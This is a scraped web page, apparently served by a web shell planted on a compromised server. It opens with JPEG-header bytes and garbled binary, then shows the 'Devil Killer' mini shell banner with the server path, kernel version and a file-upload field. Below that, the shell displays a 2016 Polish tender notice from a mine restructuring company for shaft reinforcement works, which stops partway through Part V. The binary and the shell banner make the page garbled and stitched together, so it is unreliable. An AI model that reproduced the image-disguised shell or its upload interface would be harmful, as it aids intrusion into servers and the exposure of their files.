JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160413/85976-N-2016.html

<p class="kh_header"><b>Bytom: Roboty szybowe w Oddziale CZOK   
Część I:  i/lub Część II: i/lub Część III: i/lub Część IV: i/lub Część V:   Część VI i/lub Część VII</b><br>
<b>Numer ogłoszenia: 85976 - 2016; data zamieszczenia: 13.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty szybowe w Oddziale CZOK   
Część I:  i/lub Część II: i/lub Część III: i/lub Część IV: i/lub Część V:   Część VI i/lub Część VII.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty szybowe w Oddziale CZOK   
Część I:     Wymiana zbrojenia szybowego w szybie Kolejowy I - Pompownia Siemianowice
Część II: Dostawa i wymiana zbrojenia szybowego w szybie Gigant - Pompownia Pstrowski 
Część III:   Wymiana zbrojenia szybowego szybu Mikołaj - Pompownia Pstrowski
Część IV: Dostawa i wymiana dźwigarów głównych wraz z dźwigarami rozporowymi zbrojenia szybowego szybu Ewa - Pompownia Szombierki
Część V:   Utrzymanie w ruchu układu gł. odwad. w pompowni Szombierki, w tym  utrzym. obserwacja i kontrola tam izolac., went. i bezpiecz. i szybu (Ewa), urządzeń i obiektów górn. wyc. szyb.., pompowni gł. odwadniania, zasilania w energię elektr., łaźni. - Dostawa i wymiana wrót szybowych 2 szt. wraz z oprzyrządowaniem - Pompownia Szombierki
Część VI: Dostawa i wymiana pomostów spoczynkowych i przelotowych przedziału drabinowego szybu Jan III - Pompownia Dębieńsko
Część VII: Dostawa i wymiana dźwigarów zbrojenia szybowego szybu Jan III - Pompownia Dębieńsko.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.33.00.00-2, 50.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości: 
Części I:     1 700,00 zł (słownie: jeden tysiąc siedemset złotych 00/100),
i/lub
Części II:   2 400,00 zł (słownie: dwa tysiące czterysta złotych 00/100). 
i/lub
Części III: 4 800,00 zł (słownie: cztery tysiące osiemset złotych 00/100),
i/lub
Części IV: 1 600,00 zł (słownie: jeden tysiąc sześćset złotych 00/100). 
i/lub
Części V:   360,00 zł (słownie: trzysta sześćdziesiąt złotych 00/100),
i/lub
Części VI:  1 500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100). 
i/lub
Części VII:  2 300,00 zł (słownie: dwa tysiące trzysta złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia 5.3.4. Jeżeli Wykonawca, wykazując spełnianie warunku, o którym mowa w pkt. 5.1 SIWZ polega na zasobach innych podmiotów, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w trakcie realizacji zamówienia oraz oceny, czy stosunek łączący go z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, obowiązany jest przedłożyć dokumenty dotyczące: 1) zakresu dostępnych Wykonawcy zasobów innego podmiotu, 2) sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonaniu zamówienia, 3) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, 4) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia
2.	Zamawiający uzna  warunek  w zakresie wiedzy i doświadczenia za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem robót budowlanych 
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w tym co najmniej jedną robotą budowlaną w ramach jednej umowy dla Części I÷VII polegającą na wymianie dźwigarów lub prowadników stalowych lub prowadników drewnianych lub elementów zbrojenia szybowego o wartości minimum Część I: 35 000,00 zł brutto, Część II: 50 000,00 zł brutto, Część III: 100 000,00 zł brutto, Część IV: 35 000,00 zł brutto, Część V: 10 000,00 zł brutto, Część VI: 35 000,00 zł brutto, Część VII: 50 000,00 zł brutto wraz z dowodami dotyczącymi realizacji najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujący, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Zamawiający uzna warunek w zakresie dysponowania osobami za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do realizacji zadania objętego zamówieniem w szczególności odpowiedzialnymi za kierowanie robotami budowlanymi, posiadającymi uprawnienia w zakresie: 
a) osoby kierownika działu energomechanicznego - 1 osoba dla każdej części zamówienia,
b) osoby wyższego dozoru ruchu szybowego (1 osoba na zmianę) w zakresie każdej części zamówienia,
c) osoba średniego dozoru ruchu szybowego (1 osoba na zmianę) w zakresie każdej części zamówienia,
d) pracowników brygad w zakresie każdej części zamówienia w których składzie będzie osoba z uprawnieniami: cieśli lub górnika szybowego, rewidenta, spawacza, ślusarza, obsługi wciągarek do transportu pionowego itp. (świadectwa przedłoży Zamawiającemu przed przystąpieniem do prac).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawca w druku OFERTA - załącznik nr 1 do druku SIWZ zobowiązany jest złożyć zobowiązanie z tytułu gwarancji zgodnie z pkt. II ppkt.1. Załącznika Nr 2 do SIWZ.
2.	Dokumenty potwierdzające możliwość wykonywania konstrukcji klasy 2, w tym:
- Certyfikat systemu zarządzania jakością w spawalnictwie PN-EN ISO3834-2,
- Świadectwo kwalifikacyjne uprawniające zakład do wykonywania konstrukcji stalowych klasy 2 wg normy PN-M-69008, zgodnie z pkt. II ppkt.2. 
3. Oświadczenie Wykonawcy dotyczące gospodarki odpadami zgodnie z opisem zawartym w pkt. II, ppkt 3 w Załączniku nr 2 do SIWZ 
Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1 ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 2, 2a, 2b, 2c, 2d do druku OFERTA   
Wykonawca powołujący się przy wykazaniu spełniania warunków udziału  w postępowaniu w zakresie wiedzy i doświadczenia, potencjału technicznego, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (załączniki nr 2a, 2b, 2c, 2d), zobowiązany jest uzyskać pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, które należy dołączyć do załączników nr 2a, 2b, 2c, 2d do druku OFERTA.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem:
a)	ustawowej zmiany obowiązującej stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SRK S.A. ul. Strzelców Bytomskich 207, 41-914 Bytom-30,00+VAT w przypadku odbioru osobistego (gotówka) lub pocztą (za zaliczeniem)- w przypadku pobrania SIWZ ze strony internetowej-bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2016 godzina 11:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - sekretariat Spółki (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 16.	PODWYKONAWSTWO.
1.	Informacja o obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia: 
1.	Zamawiający nie wprowadza żadnych ograniczeń odnośnie zakresu prac, których wykonanie Wykonawca zamierza powierzyć podwykonawcy.

2.	Powierzenie części zamówienia podwykonawcy:
1.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
2.	Zamawiający żąda wskazania przez Wykonawcę w ofercie - Załącznik nr 5 - części zamówienia, której wykonanie zamierza powierzyć podwykonawcy lub podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1.
3.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust 2b, 
w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie, na dzień zgłoszenia zmiany, spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I:     Wymiana zbrojenia szybowego w szybie Kolejowy I - Pompownia Siemianowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy prac:
wymiana dźwigarów szybowych wykonanych z [ 300x3500 -11 szt.
opracowanie projektu technicznego i technologii na wykonywane prace,
wykonanie i dostawa wszystkich elementów na podstawie wizji lokalnej, zgodnie z dokumentacją górniczego wyciągu szybowego, przepisami górniczymi, Polskimi Normami oraz uzgodnieniami z Zamawiającym,
Zamawiający nie posiada dokumentacji technicznej wymienianych elementów zbrojenia szybowego,
zabezpieczenie elementów powłoką antykorozyjną zgodnie z normą EN ISO 12944,
demontaż (odcięcie, odkręcenie, wykucie w obudowie szybu itp.) wyznaczonych przez Zamawiającego elementów,
transport zdemontowanych elementów do wskazanego przez Zamawiającego miejsca,
gruz będący efektem prac stanowi własność Wykonawcy do którego należy jego utylizacja, 
transport nowych elementów do miejsca ich zabudowy po ustaleniach 
z Zamawiającym,
montaż nowych elementów dostarczonych przez Zamawiającego lub Wykonawcę 
w tym zamurowanie ich w obudowie szybowej po wcześniejszym ich ustawieniu oraz wypoziomowaniu,
wytransportowanie  zdemontowanych elementów (dźwigar, itp.), do miejsca wskazanego przez Zamawiającego.,
regulacja elementów zbrojenia szybowego w szybie po zakończeniu robót zgodnie 
z aktualnym operatem pomiarowym,
wykonanie na koszt Wykonawcy po zakończeniu robót badania badań spokoju jazdy naczyń wyciągowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.33.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: Dostawa i wymiana zbrojenia szybowego w szybie Gigant - Pompownia Pstrowski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa i wymiana 10 szt. dźwigarów głównych  wykonanych z I 340 x 7000 wraz z dźwigarami rozporowymi wykonanymi z I 240 oraz wspornikami do mocowania czterech ciągów prowadników (2 ciągi prowadników drewnianych) wraz ze śrubami mocującymi i podkładkami,
dostawa wszystkich niezbędnych materiałów, elementów, części, narzędzi 
i oprzyrządowania i sprzętu niezbędnych do realizacji zamówienia w zakresie Wykonawcy, 
zabezpieczenie elementów powłoką antykorozyjną zgodnie z normą EN ISO 12944,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.33.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III:   Wymiana zbrojenia szybowego szybu Mikołaj - Pompownia Pstrowski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót dla wymiany 40 siatek przedziału drabinowego obejmuje 
transport i ustawienie urządzeń kołowrót szybowy na zrębie szybu Mikołaj.
Zamawiający dopuszcza inny sposób transportu materiałów i załogi uzgodniony 
z Zamawiającym, przygotowanie dokumentacji technicznej całego układu transportowego wraz 
z sygnalizacją i łącznością w szybie Mikołaj zatwierdzoną przez KRZG Oddziału CZOK, 
wykonanie i dostawa elementów siatek przedziału drabinowego (40 kpl), 
wszystkie elementy konstrukcji przeznaczonej do wymiany będą opuszczane szybem Gigant na poz.575m przez Zamawiającego, a transportowane wyrobiskami dołowymi na poziomie 575m pod szyb Mikołaj przez Wykonawcę. Zamawiający dopuszcza inny sposób transportu materiałów uzgodniony z Zamawiającym,
wszystkie elementy konstrukcji przeznaczonej do wymiany będą rozładowywane na środki transportowe przeznaczone do opuszczenia szybem Gigant przez Wykonawcę,
demontaż (odcięcie, odkręcenie, itp.) elementów siatek przedziału drabinowego oraz ceownika, wytransportowanie zdemontowanych elementów oraz złożenie w miejscu wskazanym przez Zamawiającego, 
montaż elementów przepierzenia i wyposażenia, w tym: montaż 40 kompletów siatek przedziału drabinowego wykonanych z pręta O 20mm i przepierzenia z prętów O 14 mm (w/w komplet stanowią 4 szt. siatek na jednym poziomie przedziału drabinowego 
o wymiarach ok. 1450x2750mm-przedzielone ceownikiem 220x4500m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.33.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV: Dostawa i wymiana dźwigarów głównych wraz z dźwigarami rozporowymi zbrojenia szybowego szybu Ewa - Pompownia Szombierki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót dla Wykonawcy będzie obejmować:
opracowanie projektu techniczno-technologicznego oraz organizacyjnego na wykonywane prace,
warsztatowe wykonanie wszystkich elementów na podstawie wizji lokalnej, zgodnie z dokumentacją techniczną, przepisami górniczymi, Polskimi Normami oraz uzgodnieniami z przedstawicielem Zamawiającego,
zabezpieczenie elementów powłoką antykorozyjną zgodnie z norm EN ISO 12944,
demontaż (odcięcie, odkręcenie, wykucie w obudowie szybu itp.) wyznaczonych przez Zamawiającego elementów,
transport zdemontowanych elementów oraz gruzu do wskazanego przez Zamawiającego miejsca,
transport nowych elementów do miejsca ich zabudowy po ustaleniach 
z Zamawiającym,
montaż nowych elementów dostarczonych przez Zamawiającego w obudowie szybowej po wcześniejszym ich ustawieniu oraz wypoziomowaniu,
regulacja elementów zbrojenia szybowego w szybie po zakończeniu robót zgodnie 
z aktualnym operatem pomiarowym,
wykonanie na własny koszt po zakończeniu robót badania spokoju jazdy naczyń wyciągowych,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.33.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V:   Utrzymanie w ruchu układu gł. odwad. w pompowni Szombierki, w tym  utrzym. obserwacja i kontrola tam izolac., went. i bezpiecz. i szybu (Ewa), urządzeń i obiektów górn. wyc. szyb.., pompowni gł. odwadniania, zasilania w energię elektr., łaźni. - Dostawa i wymiana wrót szybowych 2 szt. wraz z oprzyrządowaniem - Pompownia Szombierki.</p>
